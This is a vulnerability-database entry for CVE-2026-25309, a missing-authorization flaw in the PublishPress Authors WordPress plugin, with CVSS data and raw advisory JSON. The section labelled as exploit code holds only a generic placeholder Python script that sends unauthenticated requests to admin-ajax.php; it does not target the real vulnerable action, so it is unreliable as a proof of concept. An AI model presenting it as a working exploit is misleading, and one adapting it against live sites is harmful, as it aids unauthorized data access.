Security Vulnerability Report
中文
CVE-2026-25309 CVSS 7.5 HIGH

CVE-2026-25309

Published: 2026-03-25 17:16:44
Last Modified: 2026-04-24 16:32:54

Description

Missing Authorization vulnerability in PublishPress PublishPress Authors publishpress-authors allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PublishPress Authors: from n/a through <= 4.10.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PublishPress Authors <= 4.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: PublishPress Authors < 4.10.1 - Missing Authorization PoC # Description: This script demonstrates unauthorized access due to missing capability checks. # Note: Replace 'target_url' with the actual vulnerable endpoint. target_url = "http://example.com/wp-admin/admin-ajax.php" # The specific 'action' parameter depends on the vulnerable function in the plugin # This is a generic example for missing authorization in WP plugins data = { "action": "pp_authors_vulnerable_action", # Replace with actual action name "param": "value" } try: # Sending request without authentication cookies (PR:N) response = requests.post(target_url, data=data) if response.status_code == 200: # Analyzing response to confirm data leak if "sensitive_data_indicator" in response.text: print("[+] Vulnerability confirmed! Sensitive data leaked.") print(response.text[:200]) # Print snippet of response else: print("[?] Request sent, but could not confirm data leak from response.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25309", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:43.800", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PublishPress PublishPress Authors publishpress-authors allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PublishPress Authors: from n/a through <= 4.10.1."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en PublishPress PublishPress Authors publishpress-authors permite Explotar Niveles de Seguridad de Control de Acceso Configurados Incorrectamente. Este problema afecta a PublishPress Authors: desde n/a hasta &lt;= 4.10.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/publishpress-authors/vulnerability/wordpress-publishpress-authors-plugin-4-10-1-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}